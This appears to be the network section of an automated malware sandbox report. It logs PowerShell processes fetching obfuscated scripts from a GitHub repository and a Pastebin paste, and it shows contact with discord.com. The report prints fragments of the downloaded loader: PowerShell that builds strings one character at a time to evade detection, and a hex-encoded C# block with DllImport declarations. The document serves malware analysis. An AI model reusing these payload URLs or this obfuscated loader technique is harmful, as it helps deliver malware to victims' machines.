                                                                        Oct 15, 2024 16:00:32.619613886 CEST44349910172.67.19.24192.168.2.5
                                                                        Oct 15, 2024 16:00:32.619682074 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:32.644193888 CEST49910443192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:32.655519962 CEST4991680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:32.660605907 CEST8049916185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:32.660689116 CEST4991680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:32.660840034 CEST4991680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:32.666275978 CEST8049916185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.272958994 CEST8049916185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.274458885 CEST8049916185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.274566889 CEST4991680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.274693966 CEST4991680192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.275691986 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.275729895 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.276334047 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.276921034 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.276942968 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.279663086 CEST8049916185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.900021076 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.900096893 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.901910067 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.901928902 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.902201891 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:33.903247118 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:33.947419882 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.031930923 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032008886 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032038927 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032068968 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032079935 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:34.032092094 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032123089 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:34.032493114 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032565117 CEST44349921185.199.110.133192.168.2.5
                                                                        Oct 15, 2024 16:00:34.032613039 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:34.082180023 CEST49921443192.168.2.5185.199.110.133
                                                                        Oct 15, 2024 16:00:39.473258972 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:39.473320007 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:39.473403931 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:39.473813057 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:39.473826885 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.100395918 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.100471973 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:40.101744890 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:40.101748943 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.101983070 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.102955103 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:40.143438101 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.144927979 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:40.144934893 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.331470013 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.331540108 CEST44349952162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:40.331604004 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:40.333859921 CEST49952443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:45.386260986 CEST4986880192.168.2.5172.67.19.24
                                                                        Oct 15, 2024 16:00:46.477930069 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:46.477974892 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:46.478918076 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:46.479362011 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:46.479376078 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.086518049 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.086666107 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:47.088212967 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:47.088226080 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.088478088 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.089438915 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:47.131411076 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.132158995 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:47.132174969 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.351675987 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.351753950 CEST44349990162.159.138.232192.168.2.5
                                                                        Oct 15, 2024 16:00:47.351850986 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:47.354700089 CEST49990443192.168.2.5162.159.138.232
                                                                        Oct 15, 2024 16:00:52.373295069 CEST4990780192.168.2.5172.67.19.24

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Oct 15, 2024 16:00:01.147658110 CEST4944853192.168.2.51.1.1.1
                                                                        Oct 15, 2024 16:00:01.154500008 CEST53494481.1.1.1192.168.2.5
                                                                        Oct 15, 2024 16:00:22.654534101 CEST6494453192.168.2.51.1.1.1
                                                                        Oct 15, 2024 16:00:22.662409067 CEST53649441.1.1.1192.168.2.5
                                                                        Oct 15, 2024 16:00:23.502252102 CEST5046853192.168.2.51.1.1.1
                                                                        Oct 15, 2024 16:00:23.510067940 CEST53504681.1.1.1192.168.2.5

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 16:00:01.147658110 CEST192.168.2.51.1.1.10xe42cStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.654534101 CEST192.168.2.51.1.1.10x19ceStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:23.502252102 CEST192.168.2.51.1.1.10x2ccdStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Oct 15, 2024 16:00:01.154500008 CEST1.1.1.1192.168.2.50xe42cNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:01.154500008 CEST1.1.1.1192.168.2.50xe42cNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:01.154500008 CEST1.1.1.1192.168.2.50xe42cNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:01.154500008 CEST1.1.1.1192.168.2.50xe42cNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.662409067 CEST1.1.1.1192.168.2.50x19ceNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.662409067 CEST1.1.1.1192.168.2.50x19ceNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.662409067 CEST1.1.1.1192.168.2.50x19ceNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.662409067 CEST1.1.1.1192.168.2.50x19ceNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:22.662409067 CEST1.1.1.1192.168.2.50x19ceNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:23.510067940 CEST1.1.1.1192.168.2.50x2ccdNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:23.510067940 CEST1.1.1.1192.168.2.50x2ccdNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                        Oct 15, 2024 16:00:23.510067940 CEST1.1.1.1192.168.2.50x2ccdNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • raw.githubusercontent.com
                                                                        • discord.com
                                                                        • pastebin.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549736185.199.110.133807428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 16:00:01.173451900 CEST224OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 16:00:02.197869062 CEST543INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdfw8210159-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000802.703012,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                                        Vary: Authorization,Accept-Encoding
                                                                        Oct 15, 2024 16:00:02.198616982 CEST543INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:01 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdfw8210159-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000802.703012,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 14:05:01 GMT
                                                                        Vary: Authorization,Accept-Encoding


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549868172.67.19.24803136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 16:00:23.524663925 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 16:00:24.148631096 CEST472INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 15 Oct 2024 14:00:24 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 167
                                                                        Connection: keep-alive
                                                                        Cache-Control: max-age=3600
                                                                        Expires: Tue, 15 Oct 2024 15:00:24 GMT
                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3055ce7ef4e54a-DFW
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549876185.199.110.133803136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 16:00:24.993500948 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 16:00:25.588880062 CEST541INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:25 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120078-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000826.525899,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 14:05:25 GMT
                                                                        Vary: Authorization,Accept-Encoding


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549907172.67.19.24807296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 16:00:31.141161919 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 16:00:31.760209084 CEST472INHTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 15 Oct 2024 14:00:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 167
                                                                        Connection: keep-alive
                                                                        Cache-Control: max-age=3600
                                                                        Expires: Tue, 15 Oct 2024 15:00:31 GMT
                                                                        Location: https://pastebin.com/raw/sA04Mwk2
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3055fe099fe79a-DFW
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549916185.199.110.133807296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 15, 2024 16:00:32.660840034 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        Oct 15, 2024 16:00:33.272958994 CEST541INHTTP/1.1 301 Moved Permanently
                                                                        Connection: close
                                                                        Content-Length: 0
                                                                        Server: Varnish
                                                                        Retry-After: 0
                                                                        Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:33 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120027-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000833.203067,VS0,VE0
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        Expires: Tue, 15 Oct 2024 14:05:33 GMT
                                                                        Vary: Authorization,Accept-Encoding


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549741185.199.110.1334437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:02 UTC224OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:03 UTC904INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 27651
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "d94702de7b06d32163a3006846550b696ce8f3ceeb1225256fc4a077e265a65e"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: ACEE:24FE1A:23D12A8:279CC1C:670E7561
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:03 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120092-DFW
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000803.947982,VS0,VE126
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: fbb9157adf44355f7a87ad87a284ead1ae2f09e2
                                                                        Expires: Tue, 15 Oct 2024 14:05:03 GMT
                                                                        Source-Age: 0
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 24 50 31 20 3d 20 27 53 27 3b 20 24 50 32 20 3d 20 27 79 27 3b 20 24 50 33 20 3d 20 27 73 27 3b 20 24 50 34 20 3d 20 27 74 27 3b 20 24 50 35 20 3d 20 27 65 27 3b 20 24 50 36 20 3d 20 27 6d 27 0a 24 53 79 73 20 3d 20 24 50 31 20 2b 20 24 50 32 20 2b 20 24 50 33 20 2b 20 24 50 34 20 2b 20 24 50 35 20 2b 20 24 50 36 0a 0a 24 4d 31 20 3d 20 27 4d 27 3b 20 24 4d 32 20 3d 20 27 61 27 3b 20 24 4d 33 20 3d 20 27 6e 27 3b 20 24 4d 34 20 3d 20 27 61 27 3b 20 24 4d 35 20 3d 20 27 67 27 3b 20 24 4d 36 20 3d 20 27 65 27 3b 20 24 4d 37 20 3d 20 27 6d 27 3b 20 24 4d 38 20 3d 20 27 65 27 3b 20 24 4d 39 20 3d 20 27 6e 27 3b 20 24 4d 31 30 20 3d 20 27 74 27 0a 24 4d 67 6d 74 20 3d 20 24 4d 31 20 2b 20 24 4d 32 20 2b 20 24 4d 33 20 2b 20 24 4d 34 20 2b 20 24 4d 35 20 2b 20
                                                                        Data Ascii: $P1 = 'S'; $P2 = 'y'; $P3 = 's'; $P4 = 't'; $P5 = 'e'; $P6 = 'm'$Sys = $P1 + $P2 + $P3 + $P4 + $P5 + $P6$M1 = 'M'; $M2 = 'a'; $M3 = 'n'; $M4 = 'a'; $M5 = 'g'; $M6 = 'e'; $M7 = 'm'; $M8 = 'e'; $M9 = 'n'; $M10 = 't'$Mgmt = $M1 + $M2 + $M3 + $M4 + $M5 +
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c
                                                                        Data Ascii: 65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79, 0x00, 0x73, 0x00, 0x74, 0x00, 0x65, 0x00, 0x6D, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x75,
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36
                                                                        Data Ascii: 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x2F, 0x00, 0x2F, 0x00, 0x20, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x69, 0x00, 0x74, 0x00, 0x6
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 42 2c 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30
                                                                        Data Ascii: , 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x5B, 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00, 0
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 45 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 33 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 42 2c 20 30 78 30 30 2c 20 30 78 34 34 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 44 2c 20 30 78 30 30 2c
                                                                        Data Ascii: 00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x4E, 0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x29, 0x00, 0x3B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x5B, 0x00, 0x44, 0x00, 0x6C, 0x00, 0x6C, 0x00, 0x49, 0x00, 0x6D, 0x00,
